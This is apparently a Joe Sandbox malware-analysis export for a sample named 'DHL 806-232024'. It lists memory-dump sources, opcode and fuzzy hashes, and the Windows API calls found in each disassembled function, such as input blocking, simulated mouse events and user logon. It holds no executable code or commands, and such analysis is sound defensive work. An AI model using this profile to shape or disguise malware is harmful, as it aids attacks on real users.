                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
                                                                                  • Instruction ID: 709590350ed58bad18c2a9240fa463c04057c4516eabf14f160a8aa9665c4149
                                                                                  • Opcode Fuzzy Hash: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
                                                                                  • Instruction Fuzzy Hash: CD32F222D7DF194DD7239634D832335A248EFB73D8F15D73BE929B5AA6EB2884835100
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
                                                                                  • Instruction ID: 5d555873f34a24d23827fe7ce8f094e70f05a1167bae86e91c01038c09b807b4
                                                                                  • Opcode Fuzzy Hash: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
                                                                                  • Instruction Fuzzy Hash: 2FB11120D3AF414DD32396398835336B64CAFBB2C5F51D71BFC2674E62EB6285835541
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 00938B25
                                                                                    • Part of subcall function 008F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009391F8,00000000,?,?,?,?,009393A9,00000000,?), ref: 008F5443
                                                                                    • Part of subcall function 008F543A: __aulldiv.LIBCMT ref: 008F5463
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                  • String ID:
                                                                                  • API String ID: 2893107130-0
                                                                                  • Opcode ID: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
                                                                                  • Instruction ID: c344142aa82e183db6a4fe994dc61dc39e08f9d43e3ac80ce94af29b7a97efdd
                                                                                  • Opcode Fuzzy Hash: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
                                                                                  • Instruction Fuzzy Hash: E0210272638610CBC729CF29D441A52F3E1EBA4311F288E2DE0E5CB2D0CE30B905DB94
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 00944218
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
                                                                                  • Instruction ID: 68177d9baca06afde06d9c37d51e8935176d21a14636b41c991caf48dbcb6693
                                                                                  • Opcode Fuzzy Hash: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
                                                                                  • Instruction Fuzzy Hash: C7E01A32250214AFCB10AF5AD844E9AB7E8EF94761F008426F849C7352DAB0A8408BA1
                                                                                  APIs
                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00934EEC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: mouse_event
                                                                                  • String ID:
                                                                                  • API String ID: 2434400541-0
                                                                                  • Opcode ID: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
                                                                                  • Instruction ID: e48638165ba7662d97d75923edd50095f19c3feaff7a25ef5b049eac6ec67177
                                                                                  • Opcode Fuzzy Hash: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
                                                                                  • Instruction Fuzzy Hash: E3D052AA1607083AED388B249C6FF77020CF301782FD24AAAB102890C2E8D47C91A830
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009288D1), ref: 00928CB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
                                                                                  • Instruction ID: 7e88ea938d2ac91c3ccf57b250997a4dd33f0f02d12478232e71bc3d267be582
                                                                                  • Opcode Fuzzy Hash: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
                                                                                  • Instruction Fuzzy Hash: 5FD05E3226460EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00912242
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
                                                                                  • Instruction ID: 3435465bf640b75798ea134221bff654c01cae254ea2146140eb59c8abc51466
                                                                                  • Opcode Fuzzy Hash: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
                                                                                  • Instruction Fuzzy Hash: 64C04CF181510DDBDB05DBA0D998DEE77BCAB04315F144455A101F2140D7749B449B71
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008FA36A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
                                                                                  • Instruction ID: 56b09929b066e25f495ee163d01d500f06eb3e1bbdd375f9a00ebd24b304a8cc
                                                                                  • Opcode Fuzzy Hash: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
                                                                                  • Instruction Fuzzy Hash: 92A0113002820CAB8A002F82EC08888BFACEA002E2B008020F80C800328B32A820AA80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
                                                                                  • Instruction ID: 935929ede7cc3a9c63ce89878bb45285be28103d555cbbeae45d7234bfe81f70
                                                                                  • Opcode Fuzzy Hash: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
                                                                                  • Instruction Fuzzy Hash: 7F2268305056A6DBCF28CB2AD4C467DB7A1FB43314F3A842AD84ADB295DB34DD81CB61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction ID: 381811f22137f033ad7afd389aa5dd92bba000ae51c39f3262036e5b7a1247a9
                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction Fuzzy Hash: B9C193322150974ADF6D863AD43413EBAE1FEA27B131A076DE5B3CB5D4EF20D624D620
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction ID: 1a1fb9d43765e6f513b19cdd1b0370ea6fbef9c86bcb691d1fce38dadc36ded2
                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction Fuzzy Hash: 7FC196322151A749DF2D463AD43403EBBE1FBA27B131A076DE5B2DB5D4EF20D624E620
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction ID: d7eb66ba0e846e79f89c1dfa1ddf65a4e0dcd00146cd69c6d28bb450359566a1
                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction Fuzzy Hash: CBC1833221519789DF2D463A947803EBBE1FBA27B131A076DE5B3CB5D4EF20D624D620
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00947B70
                                                                                  • DeleteObject.GDI32(00000000), ref: 00947B82
                                                                                  • DestroyWindow.USER32 ref: 00947B90
                                                                                  • GetDesktopWindow.USER32 ref: 00947BAA
                                                                                  • GetWindowRect.USER32(00000000), ref: 00947BB1
                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00947CF2
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00947D02
                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947D4A
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00947D56
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00947D90
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DB2
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DC5
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DD0
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00947DD9
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DE8
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00947DF1
                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DF8
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00947E03
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947E15
                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00962CAC,00000000), ref: 00947E2B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00947E3B
                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00947E61
                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00947E80
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947EA2
                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0094808F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                  • API String ID: 2211948467-2373415609
                                                                                  • Opcode ID: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
                                                                                  • Instruction ID: 6383733445ec12157292f9c3f06991053421b4c786abaceea4b3d742c2459f13
                                                                                  • Opcode Fuzzy Hash: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
                                                                                  • Instruction Fuzzy Hash: A0029D71914209EFDB14DFA9CC99EAEBBB9FB48311F108559F915EB2A0CB309D00DB60
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,0095F910), ref: 009538AF
                                                                                  • IsWindowVisible.USER32(?), ref: 009538D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                  • API String ID: 4105515805-45149045
                                                                                  • Opcode ID: c806f43ab6a02b7f8933f15d3efa195908de06e1cfbd485de1aaba8df9f30dc5
                                                                                  • Instruction ID: 624cb20c85889a29d0a6bf4c8d4e07366bafae22dbc723ace254745d339b4b46
                                                                                  • Opcode Fuzzy Hash: c806f43ab6a02b7f8933f15d3efa195908de06e1cfbd485de1aaba8df9f30dc5
                                                                                  • Instruction Fuzzy Hash: 7FD1A030204315DBCB24FF25C451A6AB7A5FF95385F048959FC869B3A3CB25EE0ACB52
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0095A89F
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0095A8D0
                                                                                  • GetSysColor.USER32(0000000F), ref: 0095A8DC
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0095A8F6
                                                                                  • SelectObject.GDI32(?,?), ref: 0095A905
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0095A930
                                                                                  • GetSysColor.USER32(00000010), ref: 0095A938
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0095A93F
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0095A94E
                                                                                  • DeleteObject.GDI32(00000000), ref: 0095A955
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0095A9A0
                                                                                  • FillRect.USER32(?,?,?), ref: 0095A9D2
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0095A9FD
                                                                                    • Part of subcall function 0095AB60: GetSysColor.USER32(00000012), ref: 0095AB99
                                                                                    • Part of subcall function 0095AB60: SetTextColor.GDI32(?,?), ref: 0095AB9D
                                                                                    • Part of subcall function 0095AB60: GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
                                                                                    • Part of subcall function 0095AB60: GetSysColor.USER32(0000000F), ref: 0095ABBE
                                                                                    • Part of subcall function 0095AB60: GetSysColor.USER32(00000011), ref: 0095ABDB
                                                                                    • Part of subcall function 0095AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
                                                                                    • Part of subcall function 0095AB60: SelectObject.GDI32(?,00000000), ref: 0095ABFA
                                                                                    • Part of subcall function 0095AB60: SetBkColor.GDI32(?,00000000), ref: 0095AC03
                                                                                    • Part of subcall function 0095AB60: SelectObject.GDI32(?,?), ref: 0095AC10
                                                                                    • Part of subcall function 0095AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
                                                                                    • Part of subcall function 0095AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
                                                                                    • Part of subcall function 0095AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                  • String ID:
                                                                                  • API String ID: 4124339563-0
                                                                                  • Opcode ID: b8ce53735bb702b11fad759117edf39710cd8f58c6bb4a8b919def4bac0c024b
                                                                                  • Instruction ID: b04bfe3678a7fa48848e7e8c0546df5e0d4729ed255ad0cc62d938a264d4bd57
                                                                                  • Opcode Fuzzy Hash: b8ce53735bb702b11fad759117edf39710cd8f58c6bb4a8b919def4bac0c024b
                                                                                  • Instruction Fuzzy Hash: 7FA18F72018301AFDB10DF66DC18A6B7BA9FF89332F104B29F962961E0D734D949DB52
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?), ref: 008D2CA2
                                                                                  • DeleteObject.GDI32(00000000), ref: 008D2CE8
                                                                                  • DeleteObject.GDI32(00000000), ref: 008D2CF3
                                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 008D2CFE
                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 008D2D09
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0090C68B
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0090C6C4
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0090CAED
                                                                                    • Part of subcall function 008D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D2036,?,00000000,?,?,?,?,008D16CB,00000000,?), ref: 008D1B9A
                                                                                  • SendMessageW.USER32(?,00001053), ref: 0090CB2A
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0090CB41
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0090CB57
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0090CB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
